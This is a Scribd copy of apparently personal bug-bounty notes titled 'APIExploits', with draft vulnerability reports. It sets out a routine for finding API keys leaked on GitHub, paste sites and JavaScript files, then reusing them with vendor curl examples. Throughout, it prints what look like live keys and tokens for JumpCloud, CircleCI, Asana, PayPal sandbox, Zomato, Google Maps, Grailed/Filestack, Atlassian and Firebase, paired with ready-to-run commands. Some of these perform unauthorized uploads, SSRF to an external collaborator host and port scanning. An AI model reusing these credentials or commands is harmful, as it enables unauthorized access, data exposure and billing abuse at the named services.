Scribd
Upload
34 views

APIExploits

notes by aditya shende

Uploaded by

dokapo5462
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
34 views

APIExploits

notes by aditya shende

Uploaded by

dokapo5462
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 14

Github Recon : Keys token , access key etc

What you can do with keys ?

1. Read API Docs


2. Look for key exchnage codes : curl , python , bash
IMP: curl
3. API docs : keywords (Secret_auth_token)
4. Exchange keys

IMP

1. Secret key - access key = no exploit


2. If no API docs = no exploit,no bug
3. Key should have some priv = info dis , action : delete , revoke, upload etc

https://github.com/streaak/keyhacks

8819ada3791d0ee0e1d71587ff321253a5401a3a

1. curl -X GET \
https://console.jumpcloud.com/api/organizations/ \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'

2. curl -X GET https://console.jumpcloud.com/api/applications \


-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'

3. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"


"https://console.jumpcloud.com/api/systems"

4. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"


"https://console.jumpcloud.com/api/systemusers"

5. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"


"https://console.jumpcloud.com/api/applications"

site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org |


site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app |
site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org |
site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io |
site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org |
site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net
| site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io |
site:trello.com "circletoken"
25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af

curl https://circleci.com/api/v1.1/me?circle-
token=25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af

curl --request GET \


--url https://circleci.com/api/v2/me \
--header 'authorization: 25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af'

Steps:

1. Github, Source code , JS files etc


2. Any token,api
3. Look for API docs
4. Look for curl request
5. exchnage keys
6. exploit done

https://app.swaggerhub.com/apis-docs/Vivek-Raj/zomato-api/1.0.0#/Restaurant
%20Reviews/get_reviews

Zomato : 399720f6f904f106e162cd2bd0011a6f

Process

1. Github : "jumpcloud.com" api key


2. Got api key
3. Look for API Docs : jumpcloud api docs curl
4. Look for : curl request
5. Exchange / replace the key in command
6. CMD/ Ubuntu :
Exploit done

Exploits

Third Party : Zomato : Google Map API : Wordpress


Company Service : Uber : API
Detection : Key name , Service name

BASE URL : curl -H "Authorization: 0/ca581dda1b807b654e09b05bd8a8c70"


https://app.asana.com/api/1.0/users/me

Weglot.initialize({
api_key: 'wg_3fa15532f2f69c44a683790307a57b3c7'
});

curl -X POST \
'https://api.weglot.com/translate?api_key=wg_3fa15532f2f69c44a683790307a57b3c7' \
-H 'Content-Type: application/json' \
-d '{
"l_from":"en",
"l_to":"fr",
"request_url":"https://www.re-cap.com/",
"words":[
{"w":"This is a blue car", "t": 1},
{"w":"This is a black car", "t": 1}
]
}'

https://app.asana.com/api/1.0/users/me -H "Authorization: Bearer


0/ca581dda1b807b654e09b05bd8a8c70"

curl https://app.asana.com/api/1.0/users/me \
-H "Authorization: Bearer 0/ca581dda1b807b654e09b05bd8a8c70"

"filepicker_conversion_url":"https://
process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

curl -X POST \
-d
url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_dem
onstration_1.png/420px-PNG_transparency_demonstration_1.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

curl -X POST --data-binary @test.txt --header "Content-Type:plain/text"


"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
google query:

grailed.com api docs curl

paytm api docs curl


sement api docs curl
paypal api docs curl

curl --request GET \


--url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
--header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
--header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'

token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7

curl -v -X GET https://api-m.sandbox.paypal.com/v1/invoicing/invoices?


page=3&page_size=4&total_count_required=true \
-H "Content-Type: application/json" \
-H "Authorization:
E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"

curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e=\


{"event_type":"_active"\}start=20170301&end=20170321'

curl --header "X-Zomato-API-Key:7749b19667964b87a3efc739e254ada2"


"https://api.zomato.com/v1/search.json?city_id=1"

curl -X GET --header "Accept: application/json" --header "user-key:"


"https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"

curl -X GET --header "Accept: application/json" --header "user-key:


6aebfe02b9c7820ae965ccf5769fea39"
"https://developers.zomato.com/api/v2.1/restaurant?res_id=1"

1. Look for key name or service name


2. Look for target api docs curl
3. Look for curl command and exchange keys
4. Gather data or exploit
curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

API key exploit led to Blind SSRF, EXIF issue , Third party image upload

Hi team,

Aditya here , Found information disclosure bug . PLease look into it

Description: Disclosed API key to list user information

Developers are increasingly relying on cloud-based tools to automate building


code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.

There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.

Consider Your Data Compromised When You ro any Push a Commit


When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history

Key Found URL:


https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5
981/.env

Exploit:

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"


"https://console.jumpcloud.com/api/systems"

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"


"https://console.jumpcloud.com/api/systems"

curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \


-u API_KEY:SECRET_KEY \
-F 'file=@"/path/to/file.csv"' \

399720f6f904f106e162cd2bd0011a6f

curl --location --request GET


'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?


q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?


lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

1. "zomato.com" api key


2. zomato api docs curl
3. curl
4. exchange keys

Steps:

1. Search API DOCS : grailed api docs curl , filepicker api docs curl

Exploit
Upload any image
Exif Metadata not stripping

curl -X GET "https://www.filestackapi.com/api/file/vVHvaeQTTNKeJybLFdQN/metadata"

https://cdn.fs.grailed.com/vVHvaeQTTNKeJybLFdQN

curl -X POST \
-d url="https://w0xbntim85vtgvu72su9hdji49azyo.burpcollaborator.net/aditya.png"
\
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAg
nqCST4iPtnUxiGtTz"

site:documenter.getpostman.com inurl:"walmart"

curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories'


--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/restaurant?


res_id=56625527' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'

Hello Team,

I aditya shende found critical vulnerability , I hope you remember me ;).

Title: API config endpoint disclosed sensitive key which leads to unauthorised file
upload in grailed domain.

Description:
APIs tend to expose endpoints that handle object identifiers, creating a wide
attack surface Level Access Control issue. Object-level authorization checks should
be considered in every function that accesses a data source using an input from the
user.” - OWASP*
Since APIs enable access to objects, if authorization is broken there is a wide
attack area. Thus, authorization to API-accessible objects must be secured.

Solution: Use an API gateway and implement object-level authorization checks.


Require access tokens to permit access, and only allow access to those with the
proper authorization credentials.

Steps.
1. Visit grailed.com/api/config
2. Search for : "key" and "url" keyword (remove quotes)
Info found:
filepicker_key":"AJdAgnqCST4iPtnUxiGtTz

https://process.fs.grailed.com

Exploit:
curl -X POST \
-d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg"
\
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

In this I fetched file from another website to upload

Using this any attacker or bad person can upload a file into your website which may
lead to impersionating profile or reputation issue.
There are multiple attacks we can perform using keys but I chose file upload and
this bug is really CRITICAL so patch it ASAP

POC attached ;

================

Hello team,

Aditya here , I found keys in one of your domain which is vulnerable.

Description: An attacker can exploit the exposure of your API key by making
requests to the Google Maps API that appear to be coming from your app. A group of
malicious users could spam the API to use up your app's "courtesy" bandwidth, or to
run up your bandwidth bill if you have billing enabled for the Google Maps API. If
you (or Google) are keeping a close eye on your bandwidth usage, you could
partially defend against such an attack by revoking and replacing the maps API key
when your app's (apparent) usage of the maps API spikes.

Exploits:

API key is vulnerable for Place Details API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/details/json?
place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key=
AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Nearby Search-Places API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-
33.8670522,151.1957362&radius=100&types=food&name=harbour&key=AIzaSyAcK69n1PuaZfk7M
FnUiUjiwbIllj6V6JQ

API key is vulnerable for Text Search-Places API! Here is the PoC link which can
be used directly via browser:
https://maps.googleapis.com/maps/api/place/textsearch/json?
query=restaurants+in+Sydney&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Places Photo API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/photo?
maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrky
se7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWg
TK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key=AIzaS
yAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Directions API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/directions/json?
origin=Disneyland&destination=Universal+Studios+Hollywood4&key=AIzaSyAcK69n1PuaZfk7
MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Geocode API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/geocode/json?
latlng=40,30&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Distance Matrix API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/distancematrix/json?
units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-
73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-
73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-
73.6334271%7C40.598566%2C-73.7527626&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Find Place From Text API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of
%20Contemporary%20Art
%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,openin
g_hours,geometry&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Autocomplete API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=
%28cities%29&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Elevation API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-
104.9847034&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

Impact
costing companies extra money and in some cases DOS.
Identifies cost: $5 per 1000 request

POC:

========================================

Hi team,

Aditya here , Found information disclosure bug . PLease look into it

Description: Disclosed API key to list user information

Developers are increasingly relying on cloud-based tools to automate building


code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.

There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.

Consider Your Data Compromised When You ro any Push a Commit


When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history

Key Found URL:


https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5
981/.env

Exploit:

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"


"https://console.jumpcloud.com/api/systems"
POC:

===============================================
Hello team ,

Aditya here found security issue where I got some endpoints and I got api key in
response while exploiting

URL: https://public-api.sandbox.bunq.com/v1/sandbox-user

Exploit :
curl https://public-api.sandbox.bunq.com/v1/sandbox-user -X POST --header
"Content-Type: application/json" --header "Cache-Control: none" --header "User-
Agent: curl-request" --header "X-Bunq-Client-Request-Id: $(date)randomId" --header
"X-Bunq-Language: nl_NL" --header "X-Bunq-Region: nl_NL" --header "X-Bunq-
Geolocation: 0 0 0 0 000"

Response: {"Response":[{"ApiKey":
{"api_key":"sandbox_3ddd71f6415f3cb9f6d8fb30e3ad14fc6f0706aeaa7409f1e1e99474"}}]}

1. API Docs
2. Curl request
3. Exchnage URLS and keys
4. CMD or ubuntu = exploit

IMP
1. Check for API endpoint priv
2. Think out of the box

cat sub.txt | waybackurls | grep .js


Summary: Atlassian token disclosure and crafting nested queries with internal port
scan as SSRF may leads to application level DOS

Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user
[email protected]:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

2. I got this token from burpsuite spidering of onduo.atlassian.net

3. Now run this curl -v https://onduo.com:22 --user


[email protected]:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

We can see the time delay on port change 80,8080 giving instant response but 22
port giving late reponse

Browser/OS: NA/ Firefox

Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might


result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.

When we check command on 80,8080 port it gives speedy response but on port 22 it
gives late response . It means 22 closed. If hacker perform this attack like port
scan then this may leads to DOS

POC: https://drive.google.com/file/d/1jXxCH80e9EwGjHWMGC716iB1Z6l4_xsw/view?
usp=sharing

Hello team,

As I mentioned in 2nd step that I got token while crawling whole web app or else
simple method is that we can check source code on following endpoint--
https://onduollc.atlassian.net/projects

Steps to reproduce issue:


1. Check source code of https://onduollc.atlassian.net/projects
2. Search for "atlassian-token"
3. Atlassian token can be used for crafting nested queries but I escalated this to
SSRF port scan
4. Syntax for crafting next queries : curl -v https://mainhost.com --user
[email protected]:atlassian_token_here_lout
Exploit command:
1. On port 80
curl -v https://onduo.com:80 --user [email protected]:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

It crafted queries and gives us valid response , We can say instant response
image.png

2. On port 22
curl -v https://onduo.com:22 --user [email protected]:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me response after 1 min 45 seconds :" failed to connect on port 22"
image.png

3. On port 443
curl -v https://onduo.com:443 --user [email protected]:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me response which was instant with crafted queries

PORT443.gif

An interesting part is when I change the host on port which we check

Command is curl -v https://enroll.onduo.com:443 --user


[email protected]:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

it gave me following information :

__FIREBASE_API_KEY__ = 'AIzaSyCq7ZPizDqVfo0D8y8fTfHIDqJ5Qq7FvFc';
__FIREBASE_PROJECT_ID__ = 'diabetes-management'; __FIREBASE_AUTH_DOMAIN__ =
'diabetes-management.firebaseapp.com'; __FIREBASE_DATABASE_URL__ =
'https:\/\/fanyv88.com:443\/https\/diabetes-management.firebaseio.com'; __FIREBASE_STORAGE_BUCKET__ =
'diabetes-management.appspot.com'; __FIREBASE_MESSAGING_SENDER_ID__ =
'719737211384'

Also I tried same command with port 3306 it takes a long time

Impact: The first part is , It gives instant response on open port and when I try
with closed port like 3306,22 it takes long to craft queries

So If hacker try same attacks on closed ports so the command will force a server to
craft queries because of a closed port it's not going to craft it . Performing same
attack on closed ports to craft queries will make server engage and this may leads
to DOS attack.

Changing host enroll.onduo.com with port 443 to perform SSRF was giving sensitive
information about firebase stuff

If you've any queries feel free to ask

TASK:
grailed.com | key | exploit

You might also like